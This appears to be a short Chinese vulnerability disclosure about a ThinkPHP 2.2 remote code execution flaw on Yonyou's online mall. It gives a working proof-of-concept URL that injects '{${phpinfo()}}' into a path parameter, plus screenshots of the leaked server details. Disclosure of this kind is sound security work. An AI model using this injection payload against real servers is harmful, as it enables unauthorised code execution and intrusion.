### 简要描述:
### 详细说明:
用友网络商城ThinkPHP2.2命令执行.
1.网络商城地址
http://ec.yonyou.com
2.命令执行
http://ec.yonyou.com/index.php/module/action/param1/{${phpinfo()}}
phpinfo
[<img src="https://images.seebug.org/upload/201408/180039509db49354496f84a078522e151b604f3b.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/180039509db49354496f84a078522e151b604f3b.jpg)
IP地址
[<img src="https://images.seebug.org/upload/201408/18004022ae623012a50b13d99dcffdc473d68ef7.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/18004022ae623012a50b13d99dcffdc473d68ef7.jpg)
物理路径
[<img src="https://images.seebug.org/upload/201408/1800525351594ecec53b13d5b8eb3f6bac9a1319.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/1800525351594ecec53b13d5b8eb3f6bac9a1319.jpg)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201408/1800523889cb75257ab701c46afdd0a868c24fd1.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/1800523889cb75257ab701c46afdd0a868c24fd1.jpg)
京公网安备 11010502034610号
暂无评论